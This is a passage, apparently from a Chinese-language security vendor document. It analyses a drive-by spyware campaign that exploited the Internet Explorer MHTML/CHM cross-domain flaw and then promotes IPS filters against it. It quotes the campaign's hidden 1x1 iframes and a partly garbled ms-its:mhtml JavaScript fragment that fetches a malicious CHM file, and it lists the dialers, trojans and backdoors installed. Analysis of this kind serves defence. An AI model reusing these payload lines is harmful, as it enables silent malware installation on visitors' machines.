CHM文件处理弱点.docVIP

实例3 利用IE CHM文件处理弱点 越来越多间谍软件透过Internet Explorer的安全漏洞来完成安装。透过浏览某个网页，间谍软件便可利用以下安全漏洞：MHTML通讯协议处理程序的跨网域弱点。 在使用ITS和MHTML通讯协议引用无法存取或不存在的MHTML文件时，Internet Explorer可以从备用位置存取CHM文件。由于MHTML处理程序中的弱点，IE会错误地将CHM文件视为与不可用的MHTML文件处于相同网域。使用特制的URL，攻击者便可违反跨网域安全模型，伪装CHM文件中的任意script在不同的网域中执行，这可让攻击者取得该处理程序的用户权限执行任意程序代码。 利用此弱点，至少可安装十几个不同的间谍软件，而且有15个站点被新增到Internet Explorer的「信任网站」区域。这些间谍软件程序反过来又会安装更多的间谍软件套件。该程序代码的其它动作是建立包含多个项目的主机文件。结果还会降低「互联网」区域的「安全性」区域设定值。这些「信任网站」可让系统以「随看随下」的方法下载其它间谍软件。 浏览或登入网站33即会触发一连串的下载。此网站是一个带有色情链接的CoolWebSearch搜寻引擎。内嵌到html的iframe包含以下攻击程序代码： iframe src=”50/connect.cgi?id=333 width=1 border=0 height=1/iframe iframe src=”33/dl/adv65.php” width=1 border=0 height=1/iframe The first iframe gets a gzip encoded file that installs rdgUS333.exe, a dialer from DialerPlatform. The second iframe includes javascript with the following code： Document.write(cxw.value.replace(/\${PR}/g, ‘#109’sits:mhtml:file://c:\\nosuch.mht!33/dl/adv65/x.chm 使用根据上述弱点编译的帮助文件，软件可以取回x.chm，然后该文件会产生load.exe并在系统上执行。Load.exe会修改主机文件，产生并执行多个文件，这些文件会从下列多个站点安装拨号程序、各种特洛伊木马程序、后门程序和间谍软件。 此渗透会安装以下间谍软件： 间谍软件应用程序 说明 CoolWebSearch StartPage Hijacker 将Internet Explorer起始页劫持到34/index.php。 TIBS Premium rate dialer和Egroup Dialer 拨打国际收费号码，同时将十几个间谍软件/恶意程序安装到计算机，这些程序反过来又会安装更多的间谍软件。 MediaTicket 显示广告，降低Internet Explorer「信任区域」的安全性设定值。它会将大约20个也会安装「随看随下」间谍软件的站点安装到「信任区域」。 Trojan E、Lunii. Dowloader 下载远程文件并终止广告软件。它可建立阻挡存取特定网站的主机文件。 Trojan AML或Jeem Backdoor 可将计算机用作垃圾邮件工具，同时开启一个允许对其进行远程控制的连接埠。 OpenSetream Trojan 下载并执行间谍软件、建立图标（例如Free XXX）以及劫持Internet Explorer首页。 WebEvent Logger 具有2个组件的特洛伊木马程序，包括密码窃取特洛伊木马程序和网页 proxy PurityScan 成人搜寻工具。它会传送弹出式窗口和加载间谍软件。 间谍软件渗透总共产生了13.7 MB的网络流量并传输超过38696个封包，平均网络流量为1.77KB/s。 解决方案：IPS 可以保护网页浏览器中的安全弱点。 IPS可以在任一指定时间快速搜寻安全邮件清单、监视地下黑客聊天室、公布并追踪新出现的病毒威胁并利用其专有大型网络确定最危险的弱点。IPS厂商会每周研究、编译、测试并发布更新的过滤器以防范所有已知、已确认和即将公布的弱点问题和入侵威胁。这些过滤器可以保护网页浏览器的弱点（包括上一个实例中的弱点）。透过修改这些过滤器的动作设定值，网络管理者可以根据用户的在线活动和浏览习惯定制其保护设定值。这些安全措施增强了对恶意网络流量和潜在安全破坏的侦测和阻挡性能。特别是IPS提供的过滤器：IE CHM File Processing Vulnerability（IE CHM文件处理弱点），它